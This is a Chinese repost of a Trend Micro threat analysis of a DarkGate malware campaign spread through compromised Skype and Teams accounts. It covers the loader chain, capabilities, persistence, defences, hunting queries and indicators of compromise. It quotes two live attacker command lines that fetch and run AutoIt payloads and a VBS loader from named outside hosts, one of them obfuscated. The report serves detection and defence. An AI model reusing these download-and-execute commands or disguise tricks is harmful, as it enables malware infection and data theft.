DarkGate 恶意软件活动滥用 Skype 和 Teams

从 7 月到 9 月，我们观察到DarkGate活动（被趋势科技检测为TrojanSpy.AutoIt.DARKGATE.AA）滥用即时消息平台向受害者传送 VBA 加载程序脚本。该脚本下载并执行了第二阶段有效负载，该有效负载由包含 DarkGate 恶意软件代码的 AutoIT 脚本组成。目前尚不清楚即时通讯应用程序的原始帐户是如何被泄露的，但推测是通过地下论坛泄露的凭据或母组织之前的泄露造成的。

DarkGate 在过去几年中并不是很活跃。然而，据Truesec和MalwareBytes报道，今年我们观察到了多个活动部署。通过密切监控此次活动，我们发现大多数 DarkGate 攻击都是在美洲地区发现的，其次是亚洲、中东和非洲地区。

图1. 2023年8月至9月DarkGate活动分布

背景

DarkGate 被归类为商品加载程序，于 2017 年底首次记录。自 2023 年 5 月以来，DarkGate 的版本已在俄语论坛 eCrime 上进行广告。从那时起，使用该恶意软件的初始进入攻击数量有所增加。

DarkGate 具有各种功能，包括执行以下操作的能力：

• 执行发现命令（包括目录遍历）
• 自我更新和自我管理
• 实施远程访问软件（例如远程桌面协议或 RDP、隐藏虚拟网络计算或 hVNC 以及 AnyDesk）
• 启用加密货币挖掘功能（启动、停止和配置）
• 执行键盘记录
• 从浏览器窃取信息
• 权限提升

DarkGate 还使用 Windows 特定的自动化和脚本工具（称为AutoIt）来交付和执行其恶意功能。尽管 AutoIt 是一个合法的工具，但它经常被其他恶意软件家族滥用以逃避防御和添加混淆层。然而，从历史上看，没有观察到 IcedID、Emotet 或 Qakbot 等著名加载程序滥用它，这使得研究人员或安全团队更容易将该活动与恶意软件活动联系起来。

将 DarkGate 的最新变体与2018 年同样滥用 AutoIt 的样本进行比较，我们观察到该例程在初始阶段和在命令行中添加混淆方面似乎略有变化。然而，感染链基本上保持不变。

攻击概述

从我们研究的这个样本来看，威胁行为者滥用了两个组织之间的信任关系来欺骗接收者执行附加的 VBA 脚本。通过访问受害者的 Skype 帐户，攻击者可以劫持现有的消息线程，并制定文件的命名约定以与聊天历史记录的上下文相关。

图 2. 滥用 Skype 的 DarkGate 感染链。单击右侧按钮下载该图。

下载

受害者收到来自受损 Skype 帐户的消息，该消息包含欺骗性 VBS 脚本，其文件名格式如下： www.skype[.]vbs。文件名中的空格会诱使用户相信该文件是 .PDF 文档，同时将真实格式隐藏为www.skype[.]vbs。在我们研究的这个样本中，收件人知道发件人属于受信任的外部供应商。

图 3. 带有伪装成 PDF 文件的嵌入恶意附件的 Skype 消息。

VBA 脚本一旦被受害者执行，首先创建一个名为“”的新文件夹，然后复制合法的curl.exe，其名称与创建的目录相同，为.exe。然后，该脚本从托管文件的外部服务器下载 AutoIt3 可执行文件和 .AU3 脚本。

图 4. VBA 脚本内容示例；VBA 脚本充当两个文件的下载程序：AutoIt 可执行文件的合法副本和恶意编译的 .au3 脚本

Trend Vision One™ 通过使用 Windows 本机wscript.exe执行检测到 VBA 脚本的加载。该脚本创建了目录并将curl.exe复制到.exe。

图 5. Vision One 针对从 Skype 执行 VBA 脚本的根本原因分析 (RCA)

查看 Trend Vision One 的 RCA，我们可以观察到，curl 命令用于检索合法的 AutoIt 应用程序和关联的恶意 fIKXNA.au3（.au3 代表 AutoIt 版本 3 脚本文件）。Curl 通过cmd.exe使用以下参数执行，以从远程托管服务器检索两个文件：

C:WindowsSystem32cmd.exe" /c mkdir c:zohn & cd /dc:zohn & 复制 C:windowssystem32curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3

在另一个示例中，观察到威胁通过 Microsoft Teams 消息发送链接。在这种情况下，该组织的系统允许受害者接收来自外部用户的消息，这导致他们成为垃圾邮件的潜在目标。Truesec 的研究人员在 9 月初记录了类似的 DarkGate 技术。虽然 Skype 例程将 VBS 文件伪装成 PDF 文档，但在 Teams 版本的妥协中，攻击者却隐藏了 .LNK 文件。此外，滥用 Teams 的样本来自未知的外部发件人。

图 6. 带有恶意附件的 Teams 消息

我们还观察到 VBA 脚本的第三级交付方法，其中 .LNK 文件以压缩文件形式从发起者的 SharePoint 站点到达。受害者被引诱浏览给定的 SharePoint 网站并下载名为“Significant companychanges September.zip”的文件。

.ZIP 文件包含以下冒充 PDF 文档的 .LNK 文件：

• Company_Transformations.pdf.lnk
• Revamped_Organizational_Structure.pdf.lnk
• Position_Guidelines.pdf.lnk
• Fresh_Mission_and_Core_Values.pdf.lnk
• Employees_Affected_by_Transition.pdf.lnk

使用条件执行，仅当前一个命令失败时才会执行随附的命令。LNK 文件包含以下命令：

“C:WindowsSystem32cmd.exe”/c hm3 || EChO hm3 和 PIN"G" hm3 || cURl h"t"t"p":"//"1"85.39".1"8".17"0"/m"/d"2"J" -o C:Users\AppData LocalTemphm3.vbs & PIN"G" -n 4 hm3 || c"sCR"i"Pt" C:Users\AppDataLocalTemphm3.vbs & e"XI"t 'HlnLEG=OcCQmmcm

成功后，将下载并执行 loaderVBA 脚本 (hm3.vbs)。VBA脚本将继续从System32目录中复制curl.exe并将其重命名为“.exe”，curl命令将用于检索Autoit3.exe和关联的恶意DarkGate代码。

图 7. Trend Vision One RCA 使用 .LNK 文件作为初始条目

DarkGate AU3脚本

下载的工件包含 AutoIt 的合法副本和包含 DarkGate 恶意功能的恶意编译的 AutoIt 脚本文件。AU3 文件在加载脚本之前首先执行以下检查。如果不满足以下任一条件，则脚本终止：

• 当确认%Program Files%存在时
• 当扫描到的用户名不是“SYSTEM”时

环境检查完成后，程序会搜索扩展名为“.au3”的文件来解密并执行 DarkGate 有效负载。如果无法加载.AU3 文件，程序将显示错误消息框并终止执行。

成功执行 .AU3 文件后，该文件会生成位于C:Program Files (x86)中的代理进程。这些进程包括iexplore.exe、GoogleUpdateBroker.exe和Dell.D3.WinSvc.UILauncher.exe。它们被注入 shellcode 以在内存中执行DarkGate 有效负载。

该恶意软件通过将随机命名的 LNK 文件放入 Windows 用户启动文件夹中来实现持久性，从而在每次系统启动时按照此路径自动执行该文件

此外，执行过程还会在主机的程序数据目录中创建一个文件夹，使用随机生成的七字符字符串来存储日志和配置数据。为了帮助调查 DarkGate 有效负载和进程，可以使用 Telekom Security 的工具来转储配置文件。

表 1. 存储日志和配置数据

图 8. .AU3 脚本的片段

图 9. 提取的配置

安装后活动

据观察，该威胁充当额外有效负载的下载程序。安装 DarkGate 恶意软件后，它会将文件放入 和 目录中，这有助于其尝试伪装自己。  

丢弃的文件被检测为 DarkGate 或 Remcos 的变体，可能是加强攻击者在受感染系统中立足点的一种手段。以下是我们为这些附加负载找到的一些示例文件名：

• Folkevognsrugbrd.exe
• logbackup_0.exe
• sdvbs.exe
• Vaabenstyringssystem.exe
• Sdvaners.exe
• Dropper.exe

图 10. DarkGate 恶意软件丢弃额外的有效负载

结论和建议

在本案例研究中，攻击者在实现其目标之前就检测到并遏制了攻击。然而，我们注意到，鉴于攻击者之前的重点是广告和租赁 DarkGate，攻击者的目标可能会有所不同，具体取决于所涉及的附属机构。网络犯罪分子可以利用这些有效负载通过各种类型的恶意软件感染系统，包括信息窃取程序、勒索软件、恶意和/或滥用的远程管理工具以及加密货币挖掘程序。

在讨论的主要案例中，Skype应用程序被合法地用于与第三方供应商通信，从而更容易渗透和/或引诱用户访问恶意文件。接收者只是在环境中立足的最初目标。目标仍然是渗透整个环境，并且根据购买或租赁所使用的 DarkGate 变体的威胁组织，威胁可能会有所不同，从勒索软件到加密货币挖矿。根据我们的遥测数据，我们发现 DarkGate 导致检测到通常与 Black Basta 勒索软件组织相关的工具。

只要允许外部消息传递，或者不检查通过受损帐户滥用信任关系，则可以对任何即时消息 (IM) 应用程序执行这种初始输入技术。向组织引入任何新应用程序时都应采取措施保护和限制该组织的攻击面。在这种情况下，IM 应用程序应由组织控制，以执行诸如阻止外部域、控制附件以及（如果可能）实施扫描等规则。强烈建议使用多因素身份验证 (MFA) 来保护应用程序（包括 IM 应用程序），以防有效凭据遭到泄露。这限制了使用这些手段的威胁的潜在扩散。

应用程序白名单是一种很好的防御机制，可以通过策略部署到主机上，并确保最终用户只能访问和执行某些应用程序。在这种情况下，AutoIt 应用程序很少需要驻留在最终用户计算机上或在最终用户计算机上运行。

尽管威胁的到达向量并不是什么新鲜事，但它表明网络安全应尽可能从攻击和感染例程的左侧开始。无论级别如何，组织都应定期开展和实施信息方法，以在培训期间不断提高员工的用户安全意识。更重要的是，其目的是让人们能够认识并保护自己免受最新的威胁。通过电子邮件或即时消息劫持的线程依赖于收件人相信发件人就是他们所说的人，因此可以信任。因此，让用户质疑这种信任并保持警惕可能是提高安全意识和信心的重要因素。

此案例强调了通过Trend Micro™ Managed XDR（包含在Trend Service One™中）进行深入、24/7 监控、防御和检测的重要性，因为我们的安全分析师检测和遏制发展到高严重性的威胁的响应能力妥协在转变策略、技术和程序（TTP）方面发挥着重要作用。组织还应该考虑Trend Vision One™，它提供跨多个安全层检测和响应威胁的能力。它可以隔离端点（通常是感染源），直到它们被完全清理，或者直到调查完成。调查完成。

对于 Trend Vision One 客户，以下是 Vision One 对 DarkGate 的一些搜索查询：

• processFilePath:wscript.exe AND objectFilePath:cmd.exe AND objectCmd:(au3 OR autoit3.exe OR curl) AND eventSubId: 2

“cmd.exe”会生成“curl.exe”，它将检索合法的 AutoIt 应用程序和关联的恶意 .au3（.au3 代表 AutoIt 版本 3 脚本文件）。从查询eventSubId：“2”表示TELEMETRY_PROCESS_CREATE

• ParentFilePath:cmd.exe AND processFilePath:curl.exe AND processCmd:*http* AND objectFilePath:*vbs AND eventSubId:101

通过curl 检查是否有任何VBScript 下载。从查询中，“eventSubId: 101”表示 TELEMETRY_FILE_CREATE

妥协指标 (IOC)

SHA256

SHA256                                      指示器                                                  检测
4ed69ed4282f5641b5425a9fca4374a17aecb160    uaarsy.au3                                             Trojan.AutoIt.DARKGATE.A 
549cb39cea44cf8ca7d781cd4588e9258bdff2a1    bcdgkdb.au3                                            Trojan.AutoIt.DARKGATE.A 
e108fe723265d885a51e9b6125d151b32e23a949    edabeeg.au3                                            TrojanSpy.AutoIt.DARKGATE.AA
a85664a8b304904e7cd1c407d012d3575eeb2354    jpeg.lnk                                               Trojan.LNK.DARKGATE.A
924b60bd15df000296fc2b9f179df9635ae5bfed    jpeg.lnk                                               Trojan.LNK.DARKGATE.A
cec7429d24c306ba5ae8344be831770dfe680da4    jpeg.lnk                                               Trojan.LNK.DARKGATE.A
d9a2ae9f5cffba0d969ef8edbbf59dc50586df00    jpeg.lnk                                               Trojan.LNK.DARKGATE.A
381bf78b64fcdf4e21e6e927edd924ba01fdf03d    jpeg.lnk                                               Trojan.LNK.DARKGATE.A
4c24d0fc57633d2befaac9ac5706cbc163df747c    dcfbahk.lnk                                            Trojan.LNK.DARKGATE.A 
9253eed158079b5323d6f030e925d35d47756c10    name.ps1                                               Trojan.PS1.PEDROPPER.VSNW0DI23
0e7b5d0797c369dd1185612f92991f41b1a7bfa2    wghcbp.vbs                                             Trojan.VBS.DARKGATE.A 
7d3f4c9a43827bff3303bf73ddbb694f02cc7ecc    Folkevognsrugbrd.exe                                   Trojan.Win32.GULOADER.UVFTND
e47086abe1346c40f58d58343367fd72165ddecd    UpdatePaymentsMethod.txt.vbs                           Trojan.VBS.DOWNLOADER.AE
42fe509513cd0c026559d3daf491a99914fcc45b    NewAgreementsOperationSystem.pdf www.skype.7z          Trojan.VBS.DOWNLOADER.AE
93cb5837a145d688982b95fab297ebdb9f3016bc    NewAgreementsOperationSystem.pdf www[.]skype[.]vbs     Trojan.VBS.DOWNLOADER.AE
f7b9569a536514e70b6640d74268121162326065    TransactionRefundPaymentsList.pdf www.skype.vbs        Trojan.VBS.DOWNLOADER.AE
d40c7afee0dd9877bbe894bc9f357b50e002b7e2    NewPaymentsMerchantBanks.pdf www.skype.vbs             Trojan.VBS.GULOADER.AV
1f550b3b5f739b74cc5fd1659d63b4a22d53a3fc    FXNovusAgreements.pdf www.skype (1).vbs                Trojan.VBS.GULOADER.AV
3229a36f803346c513dbb5d6fe911d4cb2f4dab1    VooZAZANewOffer2023.pdf www.skype.vbs                  Trojan.VBS.GULOADER.AV
6585e15d53501c7f713010a0621b99e9097064ff    information-BGaming 30-06-2023.pdf www.skype..vbs      Trojan.VBS.GULOADER.AV
001e4eacb4dd47fa9f49ff20b5a83d3542ad6ba2    PaymentsModuleIntegration.pdf www.skype.com (1).vbs    Trojan.VBS.GULOADER.AV
ad1667eaf03d3989e5044faa83f6bb95a023e269    NewMultiaccountSystemOffer.pdf www.skype.vbs           Trojan.VBS.GULOADER.AV
a3516b2bb5c60b23b4b41f64e32d57b5b4c33574    AlbForexNewListProfit.pdf www.skype.vbs                Trojan.VBS.GULOADER.AV
e6347dfdaf3f1e26d55fc0ed3ebf09b8e8d60b3f    NewBankInformationTrading.pdf www.skype.vbs            Trojan.VBS.GULOADER.AV
3cbbdfc83c4ef05c0f5c37c99467958051f4a0e1    MatchPrimeTradingReportInvoice.pdf www.skype.vbs       Trojan.VBS.GULOADER.AV
f3a740ea4e04d970c37d82617f05b0f209f72789    FinanceReportNewProject.pdf www.skype (1).vbs          Trojan.VBS.GULOADER.AV
e6e4c7c2c2c8e370a0ec6ddb5d998c150dcb9f10    IntegrationTrafficList.pdf www.skype.vbs               Trojan.VBS.GULOADER.AV
45a89d03016695ad87304a0dfd04648e8dfeac8f    PlaynGoNewIntegrationSystem.vbs                        Trojan.VBS.GULOADER.AV

URL

URL                                                     描述	
msteamseyeappstore.com                                  钓鱼网站	
Drkgatevservicceoffice.net                              Disease vector	
reactervnamnat.com                                      Disease vector	
coocooncookiedpo.com                                    Disease vector	
wmnwserviceadsmark.com                                  Disease vector	
onlysportsfitnessam.com                                 Disease vector	
marketisportsstumi.win                                  命令与控制 (C&C) 服务器	
hxxp://corialopolova.com/vHdLtiAzZYCsHszzP118[.]bin     Disease vector	
5.188.87.58                                             Disease vector	
5.188.87.58:2351                                        Disease vector	
5.188.87.58:2351/iqryhosg                               Disease vector	

转载来源：https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

图片来源网络侵权可联系删除